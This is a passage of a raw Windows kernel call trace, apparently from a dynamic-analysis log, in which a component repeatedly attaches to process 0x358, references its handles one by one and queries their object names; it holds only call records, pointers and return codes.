Object=0xffffd000b1b8e378*=0xffffe00069858d30, HandleInformation=0x0) returned 0x0 [0264.942] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.942] PsReleaseProcessExitSynchronization () returned 0x2 [0264.942] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x4800c [0264.942] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.942] ObfDereferenceObject (Object=0xffffe00069858d30) returned 0x7fff [0264.942] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.942] PsAcquireProcessExitSynchronization () returned 0x0 [0264.942] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.942] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006985d2c0, HandleInformation=0x0) returned 0x0 [0264.942] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.942] PsReleaseProcessExitSynchronization () returned 0x2 [0264.942] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x4800b [0264.942] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.942] ObfDereferenceObject (Object=0xffffe0006985d2c0) returned 0x7ffc [0264.942] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.942] PsAcquireProcessExitSynchronization () returned 0x0 [0264.942] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.942] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069855090, HandleInformation=0x0) returned 0x0 [0264.942] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.942] PsReleaseProcessExitSynchronization () returned 0x2 [0264.942] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x4800a [0264.942] ObQueryNameString (in: Object=0xffffe00069855090, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.942] ObfDereferenceObject (Object=0xffffe00069855090) returned 0x7fff [0264.942] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.942] PsAcquireProcessExitSynchronization () returned 0x0 [0264.942] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.942] ObReferenceObjectByHandle (in: Handle=0xfc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698777d0, HandleInformation=0x0) returned 0x0 [0264.942] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.942] PsReleaseProcessExitSynchronization () returned 0x2 [0264.942] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x48009 [0264.942] ObQueryNameString (in: Object=0xffffe000698777d0, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.942] ObfDereferenceObject (Object=0xffffe000698777d0) returned 0x7ee5 [0264.942] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.942] PsAcquireProcessExitSynchronization () returned 0x0 [0264.942] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.942] ObReferenceObjectByHandle (in: Handle=0x130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.942] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.942] PsReleaseProcessExitSynchronization () returned 0x2 [0264.942] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x48008 [0264.942] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.942] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fff4 [0264.943] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.943] PsAcquireProcessExitSynchronization () returned 0x0 [0264.943] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.943] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.943] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.943] PsReleaseProcessExitSynchronization () returned 0x2 [0264.943] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x48007 [0264.943] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.943] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fff3 [0264.943] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.943] PsAcquireProcessExitSynchronization () returned 0x0 [0264.943] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.943] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698cea10, HandleInformation=0x0) returned 0x0 [0264.943] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.943] PsReleaseProcessExitSynchronization () returned 0x2 [0264.943] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x48006 [0264.943] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.943] ObfDereferenceObject (Object=0xffffe000698cea10) returned 0x7ffe [0264.943] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.943] PsAcquireProcessExitSynchronization () returned 0x0 [0264.943] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.943] ObReferenceObjectByHandle (in: Handle=0x230, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698d4390, HandleInformation=0x0) returned 0x0 [0264.943] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.943] PsReleaseProcessExitSynchronization () returned 0x2 [0264.943] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x48005 [0264.943] ObQueryNameString (in: Object=0xffffe000698d4390, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.943] ObfDereferenceObject (Object=0xffffe000698d4390) returned 0x7fff [0264.943] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.943] PsAcquireProcessExitSynchronization () returned 0x0 [0264.943] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.943] ObReferenceObjectByHandle (in: Handle=0x248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698ce2f0, HandleInformation=0x0) returned 0x0 [0264.943] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.943] PsReleaseProcessExitSynchronization () returned 0x2 [0264.943] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x48004 [0264.943] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.943] ObfDereferenceObject (Object=0xffffe000698ce2f0) returned 0x7fcb [0264.943] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.943] PsAcquireProcessExitSynchronization () returned 0x0 [0264.943] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.943] ObReferenceObjectByHandle (in: Handle=0x258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698d5db0, HandleInformation=0x0) returned 0x0 [0264.943] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.943] PsReleaseProcessExitSynchronization () returned 0x2 [0264.943] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x48003 [0264.943] ObQueryNameString (in: Object=0xffffe000698d5db0, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.943] ObfDereferenceObject (Object=0xffffe000698d5db0) returned 0x7fff [0264.943] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.944] PsAcquireProcessExitSynchronization () returned 0x0 [0264.944] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.944] ObReferenceObjectByHandle (in: Handle=0x274, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698d62b0, HandleInformation=0x0) returned 0x0 [0264.944] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.944] PsReleaseProcessExitSynchronization () returned 0x2 [0264.944] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x48002 [0264.944] ObQueryNameString (in: Object=0xffffe000698d62b0, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.944] ObfDereferenceObject (Object=0xffffe000698d62b0) returned 0x800f [0264.944] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.944] PsAcquireProcessExitSynchronization () returned 0x0 [0264.944] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.944] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698d7ca0, HandleInformation=0x0) returned 0x0 [0264.944] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.944] PsReleaseProcessExitSynchronization () returned 0x2 [0264.944] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x48001 [0264.944] ObQueryNameString (in: Object=0xffffe000698d7ca0, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.944] ObfDereferenceObject (Object=0xffffe000698d7ca0) returned 0x7ff3 [0264.944] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.944] PsAcquireProcessExitSynchronization () returned 0x0 [0264.944] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.944] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698d89a0, HandleInformation=0x0) returned 0x0 [0264.944] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.944] PsReleaseProcessExitSynchronization () returned 0x2 [0264.944] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x48000 [0264.944] ObQueryNameString (in: Object=0xffffe000698d89a0, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.944] ObfDereferenceObject (Object=0xffffe000698d89a0) returned 0x7fff [0264.944] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.944] PsAcquireProcessExitSynchronization () returned 0x0 [0264.944] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.944] ObReferenceObjectByHandle (in: Handle=0x280, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698d8ec0, HandleInformation=0x0) returned 0x0 [0264.944] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.944] PsReleaseProcessExitSynchronization () returned 0x2 [0264.944] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fff [0264.944] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.944] ObfDereferenceObject (Object=0xffffe000698d8ec0) returned 0x7fcb [0264.944] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.944] PsAcquireProcessExitSynchronization () returned 0x0 [0264.944] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.944] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698d72d0, HandleInformation=0x0) returned 0x0 [0264.944] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.944] PsReleaseProcessExitSynchronization () returned 0x2 [0264.944] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ffe [0264.944] ObQueryNameString (in: Object=0xffffe000698d72d0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.944] ObfDereferenceObject (Object=0xffffe000698d72d0) returned 0x7fff [0264.944] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.944] PsAcquireProcessExitSynchronization () returned 0x0 [0264.945] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.945] ObReferenceObjectByHandle (in: Handle=0x28c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698d8090, HandleInformation=0x0) returned 0x0 [0264.945] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.945] PsReleaseProcessExitSynchronization () returned 0x2 [0264.945] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ffd [0264.945] ObQueryNameString (in: Object=0xffffe000698d8090, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.945] ObfDereferenceObject (Object=0xffffe000698d8090) returned 0x7ffd [0264.945] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.945] PsAcquireProcessExitSynchronization () returned 0x0 [0264.945] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.945] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698d85d0, HandleInformation=0x0) returned 0x0 [0264.945] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.945] PsReleaseProcessExitSynchronization () returned 0x2 [0264.945] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ffc [0264.945] ObQueryNameString (in: Object=0xffffe000698d85d0, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.945] ObfDereferenceObject (Object=0xffffe000698d85d0) returned 0x7fee [0264.945] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.945] PsAcquireProcessExitSynchronization () returned 0x0 [0264.945] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.945] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698dc090, HandleInformation=0x0) returned 0x0 [0264.945] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.945] PsReleaseProcessExitSynchronization () returned 0x2 [0264.945] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ffb [0264.945] ObQueryNameString (in: Object=0xffffe000698dc090, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.945] ObfDereferenceObject (Object=0xffffe000698dc090) returned 0x7fff [0264.945] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.945] PsAcquireProcessExitSynchronization () returned 0x0 [0264.945] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.945] ObReferenceObjectByHandle (in: Handle=0x2e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698dcb20, HandleInformation=0x0) returned 0x0 [0264.945] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.945] PsReleaseProcessExitSynchronization () returned 0x2 [0264.945] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ffa [0264.945] ObQueryNameString (in: Object=0xffffe000698dcb20, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.945] ObfDereferenceObject (Object=0xffffe000698dcb20) returned 0x7fff [0264.945] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.945] PsAcquireProcessExitSynchronization () returned 0x0 [0264.945] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.945] ObReferenceObjectByHandle (in: Handle=0x300, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b91df0, HandleInformation=0x0) returned 0x0 [0264.945] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.945] PsReleaseProcessExitSynchronization () returned 0x2 [0264.945] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ff9 [0264.945] ObQueryNameString (in: Object=0xffffe00069b91df0, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.945] ObfDereferenceObject (Object=0xffffe00069b91df0) returned 0x7fff [0264.945] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.945] PsAcquireProcessExitSynchronization () returned 0x0 [0264.945] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.946] ObReferenceObjectByHandle (in: Handle=0x3a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069968090, HandleInformation=0x0) returned 0x0 [0264.946] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.946] PsReleaseProcessExitSynchronization () returned 0x2 [0264.946] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ff8 [0264.946] ObQueryNameString (in: Object=0xffffe00069968090, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0xc00000bb [0264.946] ObfDereferenceObject (Object=0xffffe00069968090) returned 0x7fff [0264.946] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.946] PsAcquireProcessExitSynchronization () returned 0x0 [0264.946] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.946] ObReferenceObjectByHandle (in: Handle=0x4ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b8fdc0, HandleInformation=0x0) returned 0x0 [0264.946] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.946] PsReleaseProcessExitSynchronization () returned 0x2 [0264.946] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ff7 [0264.946] ObQueryNameString (in: Object=0xffffe00069b8fdc0, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.946] ObfDereferenceObject (Object=0xffffe00069b8fdc0) returned 0x800f [0264.946] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.946] PsAcquireProcessExitSynchronization () returned 0x0 [0264.946] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.946] ObReferenceObjectByHandle (in: Handle=0x4cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b7f9e0, HandleInformation=0x0) returned 0x0 [0264.946] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.946] PsReleaseProcessExitSynchronization () returned 0x2 [0264.946] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ff6 [0264.946] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.946] ObfDereferenceObject (Object=0xffffe00069b7f9e0) returned 0x8000 [0264.946] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.946] PsAcquireProcessExitSynchronization () returned 0x0 [0264.946] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.946] ObReferenceObjectByHandle (in: Handle=0x4d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b82c20, HandleInformation=0x0) returned 0x0 [0264.946] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.946] PsReleaseProcessExitSynchronization () returned 0x2 [0264.946] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ff5 [0264.946] ObQueryNameString (in: Object=0xffffe00069b82c20, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.946] ObfDereferenceObject (Object=0xffffe00069b82c20) returned 0x7f15 [0264.946] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.946] PsAcquireProcessExitSynchronization () returned 0x0 [0264.946] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.946] ObReferenceObjectByHandle (in: Handle=0x4f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b83090, HandleInformation=0x0) returned 0x0 [0264.946] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.946] PsReleaseProcessExitSynchronization () returned 0x2 [0264.946] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ff4 [0264.946] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a331244, Length=0x800, 